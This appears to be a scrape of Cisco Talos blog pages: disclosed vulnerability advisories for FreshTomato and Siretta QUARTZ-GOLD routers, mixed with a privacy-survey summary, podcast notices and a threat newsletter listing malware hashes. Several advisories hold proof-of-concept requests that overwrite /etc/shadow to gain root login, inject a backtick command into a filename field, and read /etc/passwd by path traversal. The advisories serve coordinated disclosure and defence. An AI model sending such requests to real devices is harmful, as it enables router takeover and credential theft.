A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

FreshTomato 2022.5  
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020  
AdvancedTomato commit 67273b0

**PRODUCT URLS**

FreshTomato - https://www.freshtomato.org/ QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

FreshTomato is an open source firmware based on linux. The firmware offers several features for Broadcom-based routers.

The FreshTomato’s httpd component offers a simple template language to call an API during the loading of the HTML page. This process is performed through asp api. The asp api normally is not directly callable, but a FreshTomato’s API called update.cgi will allow it.

Following is one of the functions responsible for performing the update.cgi API:

    static void wo_update(char *url)
    {
        const aspapi_t *api;
        const char *name;
        int argc;
        char *argv[16];
        char s[32];
    
        if ((name = webcgi_get("exec")) != NULL) {
            for (api = aspapi; api->name; ++api) {
                if (strcmp(api->name, name) == 0) {
                    for (argc = 0; argc < 16; ++argc) {
                        snprintf(s, sizeof(s), "arg%d", argc);
                        if ((argv[argc] = (char *)webcgi_get(s)) == NULL) break;
                    }
                    api->exec(argc, argv);
                    break;
                }
            }
        }
    }
    

The wo_update function will take an exec parameter, used to specify which asp api to call, and a variable number of parameters based on the asp api to be called. We are going to focus on the notice asp api. The function responsible for performing the notice action is called asp_notice:

    void asp_notice(int argc, char **argv)
    {
        char s[64];
        char buf[2048];
    
        if (argc != 1)
            return;
    
        snprintf(s, sizeof(s), "/var/notice/%s", argv[0]);                                                  [1]
        if (f_read_string(s, buf, sizeof(buf)) <= 0)                                                        [2]
            return;
    
        web_putj(buf);
    }
    

The function takes one argument. This function will take the argument passed (effectively a filename) and use it at [1] to compose the string /var/notice/<argument passed>. The composed string is used, at [2], as argument of the f_read_string function, which will open the file and read its contents. Eventually, if the file exist, the asp_notice function will print out its contents.

The problem is that from wo_update up to the instruction at [2] no sanitization of the filename parameter is performed. If the /var/notice folder does exist, it would be possible to perform a path traversal to read any file in the file system.

**TIMELINE**

2022-10-19 - Vendor Disclosure

2022-11-08 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38451: TALOS-2022-1642 || Cisco Talos Intelligence Group

Organizations care about data privacy, but their priorities appear to be different from what their customers think are important.

Privacy is critical for business, according to 95% of security professionals surveyed in the sixth edition of Cisco's Data Privacy Benchmark Study. The survey of more than 4,700 security professionals from 26 geographies included more than 3,100 respondents who were familiar with the data privacy program at their organizations. Also, 94% of respondents said customer would not buy from them if they thought the data was not properly protected.

Another interesting thing to note: 96% say they have an ethical obligation to treat data properly.

However, there is a disconnect between what consumers say is necessary to gain their trust on how their information is used, and what organizations think they need to do to gain that trust. Consumers say transparency is the top priority to gain their trust (39%), followed by not selling personal information (21%), and compliance with privacy laws (20%). Among organizations, the priority order varied. From the business perspective, compliance with existing regulations (30%) was the number one priority for building customer trust, followed by transparency about how the data is being used (26%), and not selling personal information (21%).

"Certainly organizations need to comply with privacy laws," Cisco writes in the report. "But when it comes to earning and building trust, compliance is not enough. Consumers consider legal compliance to be a 'given,' with transparency more of a differentiator."

This disconnect is also present in regards to data and artificial intelligence. While consumers are "generally supportive" of AI, automated decision-making is still an area of concern, according to the report. Around three-quarter of consumers (76%) in the survey say providing opportunities for them to opt out of AI-based applications would help make them "much more" or "more" comfortable with AI. Consumers would also like to see organizations institute an AI ethics management program (75%), explain how the application is making decisions (74%), and involve a human in the decision-making process (75%) according to the survey findings.

Organizations, in contrast, are not prioritizing opt-outs, with just 21% saying they give customers the opportunity to opt out of AI use and 22% thinking it would be an effective step to take. The top priority for organizations was to ensure a human is involved in the decision-making (63%) and to explain how the applications works (60%). Over half of the organizations consider explaining how the application works (58%), ensuring human involvement in decision-making (55%), and adopting AI ethics principles as an effective way to gain customer trust.

The majority of respondents (92%) believe their organization needs to do more to reassure customers about the ways their data would be used with AI. Letting the user opt-out would be a highly effective way.

Enterprises Need to Do More to Assure Consumers About Privacy

We're back with another year in review focused episode. This time I'm be joined by threat researcher Caitlin Huey. We discuss the general threat landscape in 2022 including dual use tools, lolbins, and the surprising re-emergence of USB attacks in 2022.

Friday, January 27, 2023 16:01

We're back with another year in review focused episode. This time the focus will be the threat landscape generally and I'll be joined by threat researcher Caitlin Huey. In this episode we'll discuss what we found in the last year, with a focus on the general threat landscape.  We'll spend time discussing dual use tools, lolbins, and the surprising re-emergence of USB attacks in 2022.

All episdoes are available on the Talos Takes podcast page and most major podcasting outlets.

Visit the Year in Review page for the full report, with topic summary reports, livestreams, podcasts, and other content starting December 14th.  New content will be added with each topic summary release through February.  You can access the full 2022 Cisco Talos Year in Review report directly here:

Talos Takes 126: Year in Review - Threat Landscape Edition

Did you miss our livestream covering the threat landscape section in the Cisco Talos Year in Review report? Join host Hazel Burton and special guests Caitlin Huey, Nick Biasini, and Tucker Favreau as they discuss Talos' findings and experiences monitoring the threat landscape in 2022.

Friday, January 27, 2023 12:01

Did you miss our livestream covering the threat landscape section in the Cisco Talos Year in Review report? Join host Hazel Burton and special guests Caitlin Huey, Nick Biasini, and Tucker Favreau as they discuss Talos' findings and experiences monitoring the threat landscape in 2022.  

Visit the Year in Review page for the full report, each topic summary report, livestreams, and podcasts.  New content will be added with each topic summary release through February 2023.  You can access the full 2022 Cisco Talos Year in Review report directly here:

2022 Year in Review: Threat Landscape Livestream Replay

Knowing what Talos IR is responding to this quarter gives you a direct view into what needs to be most secured and most analyzed to ensure your own environment remains secure.

Thursday, January 26, 2023 18:01

Welcome to this week’s edition of the Threat Source newsletter.

What’s old is new again and what's old is still old. The fact that we are seeing a comeback of this USB thumb drive nonsense is giving me heartburn, and a headache, and my left eye is twitching …  and maybe numbness in my legs? Yes, I am getting old but I’m also just tired - not from age but from the unrelenting cycle of what’s old is new again. All simply because we can’t seem to learn from our own past. Please don’t put a random USB into any of your devices and for the last time GET OFF MY LAWN.

**The one big thing**

Cisco Talos IR posted their Incident Response Trends in Q4 2022. Ransomware continued to be a top threat Talos IR responded to this quarter, with appearances from both previously seen and newly observed ransomware families. However, Talos IR also observed a significant number of cases in which post-exploitation activities occurred where the actor’s motivation could not be determined. For example, phishing campaigns, our top initial-access vector this quarter, were equally as common and featured a variety of post-exploitation activities, including command execution to perform credential harvesting, red-teaming framework deployment and remote access tooling installation.

**Why do I care?**

Knowing what Talos IR is responding to this quarter gives you a direct view into what needs to be most secured and most analyzed to ensure your own environment remains secure.

**So now what?**

In all of Talos IR’s ransomware engagements that closed out this quarter, PsExec was used to facilitate lateral movement or execute the final ransomware executable. Talos IR recommends that organizations disable PsExec, as well as access to administrative shares, to limit lateral movement. Additionally, organizations should consider use of Microsoft AppLocker to block tools and files that have been consistently leveraged by adversaries. This helps to create another layer of enforcement for any known malicious or often-misused files.

**Top security headlines of the week**

CISA and the NSA released a joint advisory on January 25th detailing the use of legitimate remote monitoring and management software (RMM) for nefarious purposes. The joint advisory detailed attacks and warned the cybersecurity community about the malicious use of commercial RMM software, offering mitigations and indicators of compromise to watch out for.

Initial Access Broker market is booming, posing growing threat to enterprises. Research shows a sharp year-over-year growth in the number of IABs operating in underground forums and markets. For ransomware operators and other cybercriminals that are looking for quick access to enterprise networks, these brokers are the answer. (Dark Reading and GroupIB)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/quarterly-report-incident-response-trends-in-q4-2022/
*   https://blog.talosintelligence.com/threat-landscape-topic-summary-report-cisco-talos-year-in-review-2022/
*   https://talosintelligence.com/podcasts/shows/beers\_with\_talos
*   https://talostakes.talosintelligence.com/2018149/12016411-year-in-review-apt-summary-edition

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)  
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

What Old is New Again and What's Old is Me?

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:

    void input_upload.cgi(char *path,int len,char *boundary)
    
    {
      [...]   
      remaining_length_to_write = len;
      storage_udisk = nvram_get_int("storage_udisk");
      [... calculate base_folder and perform basic checks...]
      else {
        [...]
        filename_param = (char *)webcgi_safeget("filename");                                                        [1]
        filename = "";
        if (filename_param != (char *)0x0) {
          filename = filename_param;
        }
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        fd = fopen(buff,"w");                                                                                       [3]
        if (fd == (FILE *)0x0) {
          base_folder = "Unable to start pipe for mtd write";
        }
        else {
          [...]
          boundary_len = strlen(boundary);
          remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
          while (0 < (int)remaining_length_to_write) {
            n_bytes_to_read = remaining_length_to_write;
            [...]
            n_bytes_read = web_read(buff,n_bytes_to_read);
            [...]
            remaining_length_to_write = remaining_length_to_write - n_bytes_read;
            bytes_written = safe_fwrite(buff,1,n_bytes_read,fd);                                                    [4]
            [...]
    }
    

This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4]. Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
    Authorization: Basic <a valid basic auth value>
    Content-Length: 286
    Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884
    
    --906881afb7fae201f7f9962a229f9884
    Content-Disposition: form-data; name="content"; filename="content"
    
    root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
    admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
    nobody:*:0:0:99999:7:0:0:
    --906881afb7fae201f7f9962a229f9884--
    

If the request was successful, it is now possible to access the device using root:admin as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

    ❯ telnet 192.168.0.1 2323
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    QUARTZ-GOLD login: root
    Password: 
    
    root@QUARTZ-GOLD:/tmp/home/root#
    

Effectively allowing arbitrary command execution.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-39045: TALOS-2022-1611 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the m2m DELETE\_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Following is the portion of m2m binary that manages the DELETE_FILE command:

    [...]
    cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;
    if (cmdid_provided == 0x15) {
      syslog(5,"M2M Command(%02x) DELETE_FILE!!!",0x15);
      m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;
      m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;
      [... set base_folder variable ...]
      base_folder_length = strlen(base_folder);
      for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);
          current_entry_off = current_entry_off + __bswap_16(previous_data_len)){
        current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));
        if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||
            (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||
            (command_string = calloc(current_data_len + base_folder_length + 0xc,1),
            command_string == 0x0)) {                                                                               [1]
          [... invalid state ...]
        }
        sprintf(command_string,"rm -rf %s/%s &",base_folder,&UDP_data_buff.entries[0].data + current_entry_off
               );                                                                                                   [2]
        syslog(6,"Deleting file :%s",command_string + 7);
        system(command_string);
        free(command_string);
        previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off);                               [3]
        [...]
    

Following whe will briefly explain the packet composition for this command:

    struct M2M_data_entry{
            uint16_t fix_word;
            uint16_t data_len;
            char data[];
    };
    
    struct M2M_packet{
            uint16_t packet_len;
            uint16_t cmd_id;
            uint32_t pkd_id;
            uint16_t version;
            M2M_data_entry entries[];
    };
    

The UDP packet received, which can contain at most 0x251c bytes, is casted to an M2M_packet. This is a variable length structure. Indeed, inside of it there is an array of M2M_data_entry structure that is a variable length struct. To seek the various entries the variable current_entry_off is used. It starts with value 0 and then, at [4], the value M2M_data_entry.data_len of the just-parsed entry is added to seek, in the next loop, the next entry.

The DELETE_FILE command will execute the command rm -rf <base_folder>/<M2M_data_entry.data> & for each entry in the UDP M2M_packet packet it received.

At [1] several checks are performed. One related to the entry size is particular interesting: (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) where actual_data_len_recv is the total size of the UDP packet that the service received, and current_data_len is the current data entry length. Basically, this checks if the total size of the received packet minus the header (0x22 bytes) minus the current_entry_off is lower than the current_data_len. If true, the packet is invalid; otherwise a string is allocated.

The string is allocated as follow: calloc(current_data_len + base_folder_length + 0xc,1). It takes into account the base_folder length, the M2M_data_entry.data_len length of the current entry and the other characters in the format string.

The execution will reach [2] and compose the command that will then be executed. The problem is that the allocation takes into account the size provided, but then the composition of the string will use the string until the first null byte. So if the provided size is lower than the actual M2M_data_entry.data string size, a heap-based buffer overflow would occur.

**Crash Information**

    ──── registers ────
    $r0  : 0x00093ff8  →  0x41414141 ("AAAA"?)
    $r1  : 0x7ee94168  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r2  : 0x14d
    $r3  : 0x41414141 ("AAAA"?)
    $r4  : 0x41414141 ("AAAA"?)
    $r5  : 0x41414141 ("AAAA"?)
    $r6  : 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r7  : 0x1000
    $r8  : 0x0
    $r9  : 0x7ee931c8  →  0x7e0000d0
    $r10 : 0xd
    $r11 : 0x0
    $r12 : 0x41414141 ("AAAA"?)
    $sp  : 0x7ee93018  →  0x7ee931c8  →  0x7e0000d0
    $lr  : 0x41414141 ("AAAA"?)
    $pc  : 0x2acb5bfc  →   stmia r0!,  {r3,  r4,  r5,  r12}
    $cpsr: [negative zero CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ee93018│+0x0000: 0x7ee931c8  →  0x7e0000d0    ← $sp
    0x7ee9301c│+0x0004: 0x00001000
    0x7ee93020│+0x0008: 0x00093155  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93024│+0x000c: 0x2acaf35c  →  <__stdio_fwrite+72> ldr r3,  [r4,  #16]
    0x7ee93028│+0x0010: 0x00001000
    0x7ee9302c│+0x0014: 0x0000000b
    0x7ee93030│+0x0018: 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93034│+0x001c: 0x00000000
    ──── code:arm:ARM ────
       0x2acb5bf0                  orr    r5,  r5,  r12,  lsl #24
       0x2acb5bf4                  lsr    r12,  r12,  #8
       0x2acb5bf8                  orr    r12,  r12,  lr,  lsl #24
     → 0x2acb5bfc                  stmia  r0!,  {r3,  r4,  r5,  r12}
       0x2acb5c00                  subs   r2,  r2,  #16
       0x2acb5c04                  bge    0x2acb5bd8
       0x2acb5c08                  pop    {r4,  r5}
       0x2acb5c0c                  adds   r2,  r2,  #12
       0x2acb5c10                  blt    0x2acb5c2c
    ──── threads ────
    [#0] Id 1, Name: "m2m", stopped 0x2acb5bfc in ?? (), reason: SIGSEGV
    ──── trace ────
    [#0] 0x2acb5bfc → stmia r0!,  {r3,  r4,  r5,  r12}
    

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-41991: TALOS-2022-1639 || Cisco Talos Intelligence Group

An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);                                                                                       [3]
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and then used at [2] for composing the command rm -rf <base_folder>/<_filename>. The composed string is then used at [3] as argument of the system function. The _filename is not sanitized and will be used in the system function, which can lead to an OS command injection.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /delfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth value>
    Content-Length: 48
    
    _filename=`reboot`f&_http_id=<the correct tid>
    

will cause the device to reboot.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-40969: TALOS-2022-1607 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the m2m DELETE\_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many other

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Following the portion of m2m binary that manages the DELETE_FILE command:

    [...]
    cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;
    if (cmdid_provided == 0x15) {
      syslog(5,"M2M Command(%02x) DELETE_FILE!!!",0x15);
      m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;
      m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;
      [... set base_folder variable ...]
      base_folder_length = strlen(base_folder);
      for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);
          current_entry_off = current_entry_off + __bswap_16(previous_data_len)){
        current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));
        if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||
            (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||
            (command_string = calloc(current_data_len + base_folder_length + 0xc,1),
            command_string == 0x0)) {                                                                               [1]
          [... invalid state ...]
        }
        sprintf(command_string,"rm -rf %s/%s &",base_folder,&UDP_data_buff.entries[0].data + current_entry_off
               );                                                                                                   [2]
        syslog(6,"Deleting file :%s",command_string + 7);
        system(command_string);                                                                                     [3]
        free(command_string);
        previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off);                               [4]
        [...]
    

Following, we will briefly explain the packet composition for this command:

    struct M2M_data_entry{
            uint16_t fix_word;
            uint16_t data_len;
            char data[];
    };
    
    struct M2M_packet{
            uint16_t packet_len;
            uint16_t cmd_id;
            uint32_t pkd_id;
            uint16_t version;
            M2M_data_entry entries[];
    };
    

The UDP packet received, which can contain at most 0x251c bytes, is cast to an M2M_packet. This is a variable length structure. Indeed, inside of it there is an array of M2M_data_entry structure that is a variable length struct. To seek the various entries, the variable current_entry_off is used. It starts with value 0 and then, at [4], the value M2M_data_entry.data_len of the just-parsed entry is added to seek, in the next loop, the next entry.

The DELETE_FILE command will execute the command rm -rf <base_folder>/<M2M_data_entry.data> & for each entry in the UDP M2M_packet packet it received.

At [2] the rm -rf <base_folder>/<M2M_data_entry.data> & string is composed and executed at [3] through the system function. At [1] some checks are performed, but none about the content of the M2M_data_entry.data. Because any value of M2M_data_entry.data is allowed to reach the system function call, this function is vulnerable to an OS command injection.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-40222: TALOS-2022-1638 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

    void downfile.cgi(void)
    
    {
      [...]
    
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename = "";
      if (_filename_param != (char *)0x0) {
        filename = _filename_param;
      }
      [... calculate base_folder ...]
      if (*filename != '\0') {
        sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
        send_header(200,buff,"application/tomato-binary-file",0);
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        do_file(buff);                                                                                              [3]
      }
      return;
    }
    

The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2] to compose the string <base_folder>/<_filename>. Then, at [3], the specified file is sent in the HTTP response. From [1] to [2] no sanitization for the _filename parameter is performed, which can lead to a path traversal vulnerability, allowing an attacker to download any file of the file system.

**Exploit Proof of Concept**

Sending the following request to the web server:

    POST /downfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 55
    
    _filename=../../etc/passwd&_http_id=<the correct tid>
    

Would result in the web server sending the following response:

    HTTP/1.0 200 OK
    Date: Sat, 01 Jan 2000 03:33:42 GMT
    Content-Type: application/tomato-binary-file
    Cache-Control: no-cache, no-store, must-revalidate, private
    Expires: Thu, 31 Dec 1970 00:00:00 GMT
    Pragma: no-cache
    Content-Disposition:attachment;filename="../../etc/passwd"
    Connection: close
    
    root:x:0:0:root:/root:/bin/sh
    admin:x:0:0:admin:/root:/bin/sh
    nobody:x:65534:65534:nobody:/dev/null:/dev/null
    

The response for this request is the contents of /etc/passwd.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#cisco